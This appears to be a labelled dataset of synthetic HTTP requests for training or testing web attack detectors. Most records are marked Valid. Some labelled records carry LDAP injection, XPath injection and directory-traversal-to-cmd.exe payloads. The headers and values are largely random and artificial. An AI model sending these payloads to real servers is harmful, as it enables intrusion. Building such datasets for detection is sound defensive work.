If-None-Match: "YEel@C854_hKFhbvT"
If-Range: Thu, 10 Sep 09 19:46:05 UTC
Max-Forwards: 22
MIME-Version: 1.8
Pragma: hTm='E7Syr'
Proxy-Authorization: NTLM Z2huZTZwcmlldG84d2Vpc2VhZDNpZ25lZmhmZWVlbHRlZGxhOGFn
Authorization: Digest qop=auth
Range: 9092-,513-7
Referer: /megeees/8dogoe/rilrso/hcuatb/aeOfl.jsp
TE: deflate,gzip
Trailer: Authorization
User-Agent: y7WNTm6 http://www.maao.st
UA-CPU: Sparc
UA-Disp: 753,2579,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 072x109
Via: FTP/6.7 49.157.71.212, 0.3 www.oAsfstIa.shtml, FTP/8.3 www.eoEex.png
Transfer-Encoding: identity
Upgrade: hlvieb/6.1, ea8O/4.9, dmeXre/8.7, htt5c/9.5
Warning: 566 www.iaages.png "ihfood" "Thu, 27 Jan 05 04:38:01 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 91220427481224
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12706
Start - Id: 22784
class: Valid
GET /eip.shtml?rishnoxHzhiekeo=x9edttwsoOviwlht&n8gspadgeuel=xjioetszhhnmdtdsN8&tcbk=s%7C&Rfvar4P=ns%40t5&bynoi=22&eadywna=tdZPDedKIf-&EHi=n+ HTTP/1.0
Host: 177.89.144.143
Connection: close
Accept: audio/*;q=0.7, audio/*;q=0.9, text/*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: hoat7hfi-ti, treii-co4Oto, eek4w-s0aas;q=0.6, nhn-y;q=0.8
Cache-Control: min-fresh=6
Client-ip: 227.73.123.190
Cookie: k497x=377;FunionvV9rAWJOd=l@3iZ;mn9r7il0sl=eers;kiR;WUjezJSWca=7;ft7i=2pz;rhBmmdil=uddip
Cookie2: $Version="225"
Date: Fri, 11 Jul 08 14:33:45 UTC
ETag: W/"eKu6h5Nl2CjgMZnjC32"
Expect: A3ioh7yr=n5gecol;lmo0aaqh=amaurO
From: 2sn4@17ermwiU.be
If-Modified-Since: Mon, 28 Aug 06 20:36:00 UTC
If-Unmodified-Since: Sun, 08 Feb 04 05:41:32 CET
If-Match: "WA6NSuafV7qOAFdFU"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 7.9
Pragma: iwaiiosH='jeZ1s'
Proxy-Authorization: Basic NHROdHN0OnJFSWVn
Authorization: Digest realm
Range: 34-,77353-25473,-559
Referer: http://3eseDae.fr/F5cphn/ehyaD/ntli.php4
TE: trailers,deflate,chunked
Trailer: Trailer
User-Agent: slASass (n2gxU5; oK449zzcJ)
UA-CPU: 68000
UA-Disp: 9973,4219,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 396x8159
Via: uch/7.2 232.117.0.157, 5.5 www.gzwgs.htm
Transfer-Encoding: cwInlt; eMrHnd=l7nhhsVa
Upgrade: zuf/1.3, ons/6.0, ctn/4.8
Warning: 885 www.tedi.jpeg "soelhnre6erIg2cgg6" 
X-Forwarded-For: 147.118.27.36
X-Serial-Number: 058187169230158
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 22784
Start - Id: 34956
class: Valid
PUT /drfQHNe0w.T6DM-Oo_h/f6from@RxfromXJYiVEU/gpasswdBM@pqcHnZ8selectscript/dbdRSsxz@Mdrf_-/trswiTwouhAtoodl/ori5rn1NyoaRmoneT/uK@QkciVWmDzfA/5OQs226McqlO6/trtAaakU/uonosrqbZNeehwih0hc.cgi? HTTP/1.0
Content-Length: 164
Content-Language: reerh
Content-Encoding: gzip
Content-Location: http://www.okrai.st/4erhh/mzie.asmx
Content-MD5: aWNldGFucHJkYVN0d0plaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 03 Jan 10 19:59:42 GMT
Last-Modified: Sun, 30 Jan 05 15:47:03 GMT
Host: www.aaseddb5Eo.st:40
Connection: close
Accept: image/*;q=0.1, image/png;q=0.4
Accept-Charset: windows-1255;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=61
Client-ip: 157.196.232.187
Cookie: 1s-2=slsbin
Cookie2: $Version="23"
Date: Sun, 11 Feb 07 14:42:24 UTC
ETag: W/"xVmNr-ACl2KHjOXF"
Expect: ogwo8ea
From: Jfon@lR0e.de
If-Modified-Since: Thu, 07 Jun 07 02:23:20 GMT
If-Unmodified-Since: Sun, 14 Aug 05 06:29:52 CET
If-Match: *
If-None-Match: "LEHNEYDqAx8EQiFk@T"
If-Range: Wed, 14 Oct 09 18:20:04 GMT
Max-Forwards: 171
MIME-Version: 5.8
Pragma: se='go'
Proxy-Authorization: Digest uri=/rNha/ewter3/hoid/urrrh.php
Authorization: Digest realm
Range: 26302-,-510,4934-
Referer: http://www.mLlSEo3r.be/7ten1/anir/iund/A7mocl/EtsafnT.htm
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 6.6; rb-ex; rv:3.7.8) Gecko/28617929
UA-CPU: x86
UA-Disp: 9134,470,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 383x9040
Via: 8.8 www.itrc.tiff:1734, Kue/1.2 www.S5Eto.shtml
Transfer-Encoding: deflate
Upgrade: innn6t/6.3, msmcsf/6.6, i2Dtn/7.9, oet/3.7
Warning: 360 62.80.65.21 "urvcnetdenma" "Tue, 25 Sep 07 21:36:03 CET"
X-Forwarded-For: 230.185.56.242
X-Serial-Number: 755245432377424
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pr7mltt9e0t=89&x5ghfnua5u=7rmemotLaksn&ueg=awlDuWH&URLUw='z&esgpwnta==sun&yotlwuratMs=Gi m1&wbaJc82jEC=81071&tve=e0tMGy9qq&ueths8p=nu1k&sjrinlasnttEott=04009508

End - Id: 34956
Start - Id: 39088
class: LdapInjection
POST /aavl/l_O@YS2s/uC96uf8C/nmanmati.html? HTTP/1.0
Content-Length: 241
Content-Language: RhbOiba,nsb0
Content-Encoding: gzip
Content-Location: /3itq9T/szIzaslu.tar
Content-MD5: Y2V1aWJleG5EWW1pZnUzVw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Oct 04 18:26:19 GMT
Last-Modified: Fri, 15 Jun 07 15:36:22 UTC
Host: www.5bis.biz
Connection: close
Accept: image/*;q=0.4, video/*;q=0.8, application/*
Accept-Charset: gb2312;q=0.0
Accept-Encoding: 
Accept-Language: rbs-c;q=0.2, 0GdICnec-tiUhatut;q=0.2, 1-2mmq;q=0.5, oosa-alB7eu;q=0.4, Bfdi-2jwtmu
Cache-Control: no-cache
Client-ip: 184.176.224.12
Cookie: 8yjI4B=054;rseler=nYEXkg@;dorni=ncuu= window.openh73E5iahixAhl;Nwboieettm=)  (|  (displayName=had*) (name=    had*)(    mail=had*    );asevtonhhr=658303;rcpCxgYL=6m 
Cookie2: $Version="88"
Date: Wed, 10 May 06 01:29:04 CET
ETag: "BWqjOvXKpzewDTHQrt"
Expect: 100-continue
From: sqarh@agbp.net
If-Modified-Since: Sun, 29 Feb 04 05:25:41 UTC
If-Unmodified-Since: Wed, 07 Mar 07 15:49:53 UTC
If-Match: *
If-None-Match: "IZtJr26upA9ITxvFcd"
If-Range: *
Max-Forwards: 277
MIME-Version: 1.0
Pragma: no-cache
Authorization: Digest opaque="Srpe"
Range: 5646-401977,1107-6680,-60
Referer: http://www.ljN9.gov/totib.gif
TE: trailers
Trailer: Expect
User-Agent: Mozilla/0.6 (Machintosh; U; Mac OS X 5.1; lH-s6; rv:9.0.7) Gecko/36298237
UA-CPU: PowerPC
UA-OS: Win95
UA-Color: color32
UA-Pixels: 604x1864
Via: 2.9 150.126.212.133
Transfer-Encoding: identity
Upgrade: M1r2t/2.6, amimlh/2.2
Warning: 809 www.Mggpkus.css "hf91iksbiA" "Sat, 12 Nov 05 05:54:57 GMT"
X-Forwarded-For: 171.128.179.42
X-Serial-Number: 173254856208744032
----: ------------
~~~~~: ~~~~~~~~~~~

Shaddskrd3gPw=xMk.gVlM@&ou=ykaehttp&1dsgnlm=05t&tj=svbscriptaRt&eh=6M_PbugFduHJ&ent3Iqamj=d zcwOtglocationst[f]t&lan6fmtjTees=en7ps&YLylO=gZl6Y3tSG&3oh6=6200554&ioeehe6hlome=isdotgestdinetc;o7as&ausutsa=eps%on0kp?[\s-edta erm

End - Id: 39088
Start - Id: 18568
class: Valid
GET /gtvaJaamiae/wlulqelsoapieyjw/dsnoaelEonnot5avjVne/6VOUModb3BqC.gif?nNZLKv3=usrsamtdstf9d%24O%5Cderiaod&2hgonrTD=scriptacopyB HTTP/1.1
Host: 143.41.158.11
Connection: oeqsns
Accept: application/x-tar, video/quicktime;q=0.4, video/mpeg
Accept-Charset: euc-tw, x-mac-chinesesimp
Accept-Encoding: *;q=0.1
Accept-Language: petgzcto-xhxekb;q=0.0, 4Vd-esC, dq-e1sass
Cache-Control: no-transform
Client-ip: 168.84.48.173
Cookie: naeeeses=:r;psIpasswdkESAdA=oU-1oW0l
Cookie2: $Version="3"
Date: Sun, 23 Sep 07 12:28:43 CET
ETag: "GDJTF8vTAvm33lGvq"
Expect: 100-continue
From: tyie@t8hupt4y.biz
If-Modified-Since: Thu, 22 Feb 07 10:52:44 UTC
If-Unmodified-Since: Sun, 29 Jul 07 18:12:51 CET
If-Match: "Uj7S3pvCkDbA5Q_"
If-None-Match: "Fs_JA14L1fUY5XvhynyQ"
If-Range: *
Max-Forwards: 72
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest qop=mb3ea
Authorization: NTLM RGFlaGV0b3h0ZXRldGxoZTNkeWZydWE2bWRscmVhc292ZW9FbnBoaXB0MHRlVG4=
Range: -49105,7-,-99029
Referer: /eeergd.tar
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: rpElvcSs/9.2.1.6
UA-CPU: x86
UA-Disp: 973,9699,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 924x1764
Via: FTP/2.9 www.lhea.css, 8.2 16.163.176.4, HTTP/8.4 246.14.179.60
Transfer-Encoding: asfeii
Upgrade: nwhsoz/5.6, ahe/8.5
Warning: 614 161.115.13.64 "herotd8lhErudyjden" "Sun, 22 Jul 07 15:37:39 GMT"
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 507234397267768
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18568
Start - Id: 26804
class: Valid
GET /da9OmwkFK8/r0rov_9kFnP-YQFc1LEu/u53qIADi.ScC.css? HTTP/1.0
Host: 77.252.90.28
Connection: 3eop9sa
Accept: */*;q=0.5
Accept-Charset: x-mac-cyrillic;q=0.7, x-mac-hebrew
Accept-Encoding: *
Accept-Language: sesebeu-CR;q=0.6
Cache-Control: no-cache
Client-ip: 194.89.160.41
Cookie: dfb6rtAenf=1092;eityuet=bF06;saedqrfpw=e4wewooeebdnmdn;gnleIrrmrz=e4JGdvR.
Cookie2: $Version="241"
Date: Fri, 12 Aug 05 14:20:46 UTC
ETag: W/"DllW_o3W2MtpvaRR9EF"
Expect: uisr
From: 4ahee@onawd.st
If-Modified-Since: Mon, 11 Jun 07 07:41:02 UTC
If-Unmodified-Since: Thu, 15 Feb 07 17:54:08 CET
If-Match: *
If-None-Match: "XjfUwzcExKJ5t9iCY4_C"
If-Range: *
Max-Forwards: 1015
MIME-Version: 8.3
Pragma: iI8t3oer='nc0'
Proxy-Authorization: Digest realm
Authorization: NTLM bWF3MW1yaWFyc2xkbnNlaHNydHNjMjZjdWhiZW5vc2ZjaXJlbw==
Range: 9863-84,596677-13385,-813210
Referer: /mu0jfa6/Trte/sp5rWnjs/ttaenti.ace
TE: trailers
Trailer: Via
User-Agent: 18TgPuP2 http://www.3n4coRte.de
UA-CPU: StrongARM
UA-Disp: 8290,106,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3935x4964
Via: 5.0 222.60.67.255, HTTP/2.8 32.210.68.24, 7.5 www.j6O7p.shtml:4531
Transfer-Encoding: gzip
Upgrade: opiEo/2.6, i3n5Ve/7.1
Warning: 269 www.i6Whrlab.tiff:1 "5pHj" 
X-Forwarded-For: 46.254.197.126
X-Serial-Number: 51104
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26804
Start - Id: 44516
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 203.84.21.86:57
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 59.223.109.143
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="1"
Date: Fri, 10 Jun 05 08:22:21 GMT
ETag: "yyCTde2YbaYtn_WvXx"
Expect: zfHsd=neeRao
From: bsntalu@ofn3s.de
If-Modified-Since: Fri, 26 Mar 10 09:09:18 GMT
If-Unmodified-Since: Fri, 06 Jun 08 09:44:51 CET
If-Match: "ygxw0oO2wAerM5Mu"
If-None-Match: "6mtLE695gjWc2wdkPTH5"
If-Range: *
Max-Forwards: 80
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: Digest opaque="oool"
Range: 0-753213
Referer: /HhaTE.shtml
TE: trailers
Trailer: Warning
User-Agent: Mozilla/8.0 (compatible; 1BHeMWbx8e; WinNT; rs5bnsrbn; em8vslet; n8xroew)
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 455x841
Via: 0.4 144.152.225.64, 9.7 183.198.168.248, HTTP/9.3 9.233.72.70
Transfer-Encoding: compress
Upgrade: LasAP/0.2
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44516
Start - Id: 17566
class: Valid
GET /7u/t4gtont6uea9n/S@yreplaceyinsertGA8bodyFUDB/eettiTahe/tC/t5stfkiopoeh/0schtcptirkititkat/areokCataGSTonr/R4passthru.cfm?nesstuiwei=tetwsvt&ftgmeF=7&soodisMosrdoJ8=nhrega0dduo&nhe=gitaoskehtde HTTP/1.1
Host: 128.36.19.156
Connection: xmea
Accept: text/html;q=0.6, video/*;q=0.1
Accept-Charset: x-mac-arabic, x-mac-korean
Accept-Encoding: gzip, gzip, compress;q=0.2, gzip, compress;q=0.6
Accept-Language: EeBa3re-doyd;q=0.5
Cache-Control: zkeedid='ienoymr'
Client-ip: 90.51.253.164
Cookie: snmeAdoeg4y=9853382;ikEnlrttagYdh=632
Cookie2: $Version="13"
Date: Sun, 02 Apr 06 12:58:14 UTC
ETag: "yFsCQA0qcZwD8_Euq"
Expect: 100-continue
From: minsiah@ea4perqO.uk
If-Modified-Since: Wed, 04 Feb 09 07:00:02 CET
If-Unmodified-Since: Sun, 20 Sep 09 23:12:05 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 248
MIME-Version: 3.0
Pragma: gwoLir='Mraae'
Proxy-Authorization: hseIen i6llt6e=toooe
Authorization: Basic dGkxYWlyb2g6Nm9Tb3MydQ==
Range: 22389-71,-169,-0
Referer: http://tojSet.fr/ifhqxNn/onimO/ehshiu.cfm
TE: trailers,trailers
Trailer: Accept
User-Agent: lnolee0ze/9.8.0.5.0
UA-CPU: x86
UA-Disp: 037,032,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 519x8664
Via: 9.6 www.qhhMiu.tiff, ehDeP/2.2 15.60.51.166:0020, 1.8 www.n6eEhA.css:54626
Transfer-Encoding: enwhrb
Upgrade: httos/8.2, cIe/0.7
Warning: 480 www.tc3brn.tiff "EmlS" "Mon, 08 Nov 04 17:28:58 CET"
X-Forwarded-For: 203.39.140.226
X-Serial-Number: 2432854713
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17566
Start - Id: 10788
class: Valid
GET /j4OoXpzugeq/7I/snln/nwttul1hbtnhsenb5c/janlsRhh/om4tlfinrhoGngNLesn/aeN0j1Z8T@TdP5PY/hhwc4C1BMqxI.jpg?ucnklnm4u2dnhpO=9nodeep+s4n+i0 HTTP/1.1
Host: 214.87.144.212
Connection: close
Accept: audio/*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: lgldt-cnt;q=0.9, Ndw-3edodi;q=0.3
Cache-Control: min-fresh=0738
Client-ip: 199.46.207.250
Cookie: tIinIiA8grsicu=pcOOP;teReget6aoy=0luACBL;TeshtaT=837;ma8eduE=Nbhrmal czrne
Cookie2: $Version="49"
Date: Mon, 26 May 08 22:11:44 CET
ETag: "dj5pfhCn@Kxq-E0GRFF"
Expect: ihu0Tar=eipet;rnqgndd=otyrd
From: h9c8hnsN@a7aiBaofb.net
If-Modified-Since: Tue, 01 Aug 06 17:26:44 UTC
If-Unmodified-Since: Wed, 18 Jun 08 22:26:51 CET
If-Match: "LpQ2gxx4wCO795Xl"
If-None-Match: "5n38zsqLHs-enQmT"
If-Range: Tue, 14 Oct 08 13:13:28 CET
Max-Forwards: 1
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic ZG5lMWU6c2VlcGNvbGM=
Authorization: Digest nonce
Range: 9796-,-734449,-593032
Referer: /lrde92.txt
TE: gzip,trailers
Trailer: Warning
User-Agent: sa2Dl7Pafa (eJ9TT3INQ)
UA-CPU: 68000
UA-Disp: 4468,6865,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5414x362
Via: HTTP/5.8 www.eKeci.jpeg, HTTP/9.7 19.153.174.216
Transfer-Encoding: gzip
Upgrade: tup/2.0, iesn/6.5
Warning: 309 www.s9ma6acr.js "CoeeeXendoid" 
X-Forwarded-For: 64.18.140.176
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10788
Start - Id: 30256
class: Valid
GET /wa.ukE/oKwgetB0sp61X/7I/dzce1Vo@ty@Fap.cgi?1onid=r-4n&did=ltsZgSld4O7n&e4rsirauw=38988529&ci9ra4iti=piAjoen+g1s+openhef&agboos=637384&gei3Nel=xmeta&ao=+an2AiEi&temS=81946797&e1=1o%5Ce%5Cec&ahrnui1r=92720&z2-1Usock_streaminX=5662 HTTP/1.0
Host: 1.220.188.176:80
Connection: close
Accept: image/png, audio/*;q=0.0
Accept-Charset: gb2312;q=0.9, windows-1257, windows-1257;q=0.4, x-mac-korean
Accept-Encoding: deflate;q=0.3, compress
Accept-Language: *
Cache-Control: max-age=56
Client-ip: 0.206.225.217
Cookie: thneGksIt=ztqOCKd8T;nAlteoqp6hhnote=4iL%
Cookie2: $Version="71"
Date: Fri, 25 Sep 09 01:31:28 CET
ETag: "q4IL6nQT8JnrD.QqB"
Expect: 100-continue
From: OtuSewg@hqerotci.biz
If-Modified-Since: Fri, 21 Dec 07 18:19:04 CET
If-Unmodified-Since: Tue, 19 Apr 05 12:07:40 CET
If-Match: "xhUf2Mj3WZkhwPa"
If-None-Match: *
If-Range: Sun, 28 Feb 10 07:28:45 GMT
Max-Forwards: 5181
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZzdnYzMzcnh0ZW15cjVpdHhyb3NybUh5TzR1bnZuenhpaGlJYnNu
Range: -8
Referer: /vanri/8reseit/rUsutfr.asmx
TE: trailers,chunked;q=0.0,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/2.0 (compatible; MSIE 6.2; Solaris; twid; io7hr)
UA-CPU: StrongARM
UA-Disp: 790,434,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2607x1931
Via: 3.3 223.198.116.105, ahxtm/2.8 84.131.135.72:74712, eiao1/0.7 www.liee.js
Transfer-Encoding: compress
Upgrade: 92ti/2.3, helqbf/3.9, e7crte/0.3, xhgFid/0.0, a5e/8.9
Warning: 129 www.4od57o.jpeg "yOsa6fhl9hr" "Tue, 17 Jul 07 20:05:50 UTC"
X-Forwarded-For: 204.99.102.221
X-Serial-Number: 605112430
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30256
Start - Id: 1367
class: Valid
GET /edQazvfGCcWYc8E.bin?at=s&IT.sRm5=1&0objectMgxwOf-5m=Ag&qttoaggls=%3CG%27a&heioTrh6EsN6rH=eac&hu=%5Do&muon=954&jufjh=ciehin9window.opennwOee&dktolo=533164930&cUwd=ss7s9&eramnp=255&ed2ew2nltaj=poptut&fnhtmzp4R=cuerCer7eqCArlmJ&dlOak3ri=mr%25rOl+wn%3C9ue%28m7igunions HTTP/1.1
Host: 146.168.67.218
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: eohe-vijZwnta;q=0.5, e8eha-lpa, hvoeare-ebmwf, tT-heliu;q=0.4
Cache-Control: e='2hn5iiP3'
Client-ip: 53.145.248.81
Cookie: kyC9FautoexecY=566724611
Cookie2: $Version="4"
Date: Sun, 02 Mar 08 16:37:04 UTC
ETag: W/"NLDDHcD.qj9@50a1FAQw"
Expect: 100-continue
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Sat, 20 Mar 04 23:31:02 UTC
If-Unmodified-Since: Wed, 22 Mar 06 04:16:24 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Apr 07 11:48:38 UTC
Max-Forwards: 6202
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWhnckVyenJ0ZWlvc2loRm82dHF0d0thaGRvVmxwYTFvZjJ4ZWxvZHVOaWc2aA==
Authorization: emmDIe t0nmlL=fotR
Range: 24-
Referer: http://www.ss3il.ch/8iot/tohM/spqHo/tk6hfo/s5P9dtvi.nsf
TE: deflate;q=0.3,deflate;q=0.8
Trailer: Date
User-Agent: rhxdutnsi (rdoY_Z)
UA-CPU: Sparc
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 956x464
Via: FTP/7.8 www.dhfylW.js, FTP/3.2 www.kd9m.shtml, 0.8 27.240.228.50
Transfer-Encoding: deflate
Upgrade: Iifh/3.1, atthe/8.5
Warning: 857 www.Snpe.htm "qdO3unnssateraarij" 
X-Forwarded-For: 188.179.244.100
X-Serial-Number: 147844
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1367
Start - Id: 49378
class: XPathInjection
GET /f56iguaiiaoxrtUk140M/tuLFDKpC86/QNd337fGO.uY.jpg?ax=080+++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++92060%3D HTTP/1.1
Host: www.eaf14R7.it:3595
Connection: close
Accept: application/*, image/jpeg, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 53.109.82.7
Cookie: oThvslw=71;gi7rrmsru6=l9e;tee=ryhd3;sttMnel=seetl(iti;eeBomresiac=u\sa~tkrt
Cookie2: $Version="951"
Date: Mon, 19 Jun 06 18:17:34 CET
ETag: "8EMWsrpgGBvHJnZ9p9om"
Expect: iwWhno9
From: otln@tpiaietAi5.st
If-Modified-Since: Sun, 30 Nov 08 24:14:25 UTC
If-Unmodified-Since: Mon, 31 May 04 13:01:45 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Jul 09 15:38:40 CET
Max-Forwards: 1
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: 878eg 7nct0tke=ns8hu
Range: 79-,-25900
Referer: /RgnIoo/isrlir/hnod/7mha.swf
TE: chunked
Trailer: Pragma
User-Agent: lO3r4K8uT- http://www.yemhostl.de
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0695x2392
Via: 6.9 www.fp7naYe.png, FTP/6.3 www.nrviim.html, pike/0.2 95.107.182.137:68
Transfer-Encoding: identity
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 968 150.103.51.182:94997 "eidcatleEean" "Fri, 27 Aug 04 02:02:34 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49378
Start - Id: 31315
class: Valid
GET /egdozXk0A6XMN5w4-p/hCYywr-46Zv6n0X/snKP/6mklTc7nLf8o0b/nroshmeljrb/kY7BJ9JZafXv/bntiainhgoiCbx/yzseoPrhnbanem.exe?g-gn.CWu=io3&Lia3=olisgonyFrn%7C%285ee%3Dn++&vms7a=tCCK5T HTTP/1.1
Host: 168.58.37.29
Connection: close
Accept: text/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: la-owq;q=0.0, mONeuRs-8tierab;q=0.8
Cache-Control: max-age=9991
Client-ip: 115.41.215.171
Cookie: cmdHjB-fo=yt? ;rSs=168029;puuu=4
Cookie2: $Version="7"
Date: Wed, 29 Sep 04 03:33:26 CET
ETag: W/"CBA8E6CDeaAE0rORVlA"
Expect: gtremu
From: rgc6ndo@etox.net
If-Modified-Since: Mon, 29 Aug 05 20:33:41 UTC
If-Unmodified-Since: Mon, 13 Aug 07 23:33:41 UTC
If-Match: *
If-None-Match: "uY7fGN_YnPcGe7IQVS"
If-Range: Sun, 24 Jul 05 12:25:34 CET
Max-Forwards: 364
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rnibihas"
Authorization: Digest uri=/txeyHeD/tnqf8hq/i2tqel6a/ruhfsrr/qcnddtm.wmn
Range: -388719
Referer: /0eiP3tMi/vxvl/radHg.exe
TE: deflate
Trailer: If-Range
User-Agent: aBPP4U http://www.4sTb.net
UA-CPU: MIPS
UA-Disp: 1773,6929,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3795x126
Via: FTP/9.0 56.208.145.168
Transfer-Encoding: gzip
Upgrade: dGeost/2.9, rda/6.8
Warning: 107 www.ohem.gif "gsElmnsdshO7" "Wed, 21 Mar 07 14:34:20 GMT"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 61504
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31315
Start - Id: 8854
class: Valid
GET /iJ/eChJb9lf_DV8t9pl4E2J/so/gLsg6I/fplwnae.php3?cmd.vftp8InullwJ3EU=1y%2Fa&swtos=945227&9efawg4dfcle3J=5753093964&enaylises7nt=x9axJ9xf&5Vwindow.open3RkSpE87=neval%3Bri&5girebtseid=0m&uttwi2=onraeh&mpqdroepys3n=p%3C%28dw HTTP/1.1
Host: 223.80.254.42
Connection: riyl
Accept: */*
Accept-Charset: macintosh;q=0.9, iso-2022-jp;q=0.2, iso-8859-8-i;q=0.4, euc-jp;q=0.5, x-mac-turkish
Accept-Encoding: 
Accept-Language: i-htonei
Cache-Control: max-stale=861
Client-ip: 131.52.46.51
Cookie: lirleyya1a=jntsb;rsna=xEt nae[T nwqa;KvncC-qs=839849;mo8ynte=yUnsohRnitieaeewo;yrS8nu7968z=asimseraRzpliaw3e;dn0dssxvh6=c;tmpt-
Cookie2: $Version="67"
Date: Thu, 01 Jan 09 21:18:29 UTC
ETag: "Hb@9V0GJ-D4mCB2c1tH"
Expect: 100-continue
From: nnsIg@cmoeufg.uk
If-Modified-Since: Fri, 05 Mar 04 24:35:17 GMT
If-Unmodified-Since: Sat, 13 Sep 08 16:50:53 GMT
If-Match: *
If-None-Match: *
If-Range: "yrh.4q0812bsXRB"
Max-Forwards: 575
MIME-Version: 1.5
Pragma: hiewnh=ooaC1l
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: NTLM cXdzaE14aWhjT21oeW5OYmhtZUFhZHRlaGhvaVRnbnR6c1Q0bWU3aHNv
Range: 7-
Referer: http://ojt5i.ch/e7dbs.pl
TE: deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/6.2 (Windows; U; Windows NT 6.3; ci-b0; rv:5.0.3) Gecko/78997466
UA-CPU: StrongARM
UA-Disp: 909,1237,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 186x0429
Via: FTP/5.9 22.185.17.144, HTTP/3.8 34.96.149.14
Transfer-Encoding: compress
Upgrade: it9o/7.8, e4esfs/7.3, Csos/8.4
Warning: 091 www.bqal5R.jpg "tAj9t" 
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 56388963279118
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8854
Start - Id: 26410
class: Valid
GET /4o5/898vBH3HTqt/dE/seiLese/Tnoeafvtamr/cdh2_11kKSucqXKz8A/lmwsriYb4dia/6delete5Jyc4h/bgz/yi0alztah/mA/ipH2omOwtie9l.sh?4f865oI4eo=41673&oaquTQACqi=a&phOsji=534&nd4uidsuoercdir=Az&ai=6euyisaIrodo HTTP/1.1
Host: 176.4.201.255
Connection: hodot
Accept: */*
